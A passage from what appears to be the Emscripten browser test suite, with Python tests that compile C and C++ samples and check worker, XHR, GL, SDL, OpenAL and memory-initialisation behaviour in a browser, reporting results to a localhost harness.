self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.test_port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
run_process([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.test_port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
run_process([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args,
timeout=30)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
# NOTE: Should FULL_ES3=1 imply client-side vertex arrays? The emulation needs FULL_ES2=1 for now.
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'USE_WEBGL2=1', '-s', 'FULL_ES2=1', '-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
@requires_threads
def test_emscripten_api(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first')
open('file2.txt', 'w').write('second')
setup()
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
run_process([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'])
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
run_process([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
for wasm in [0, 1]:
print(wasm)
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
run_process([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''' % self.test_port)
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.test_port)
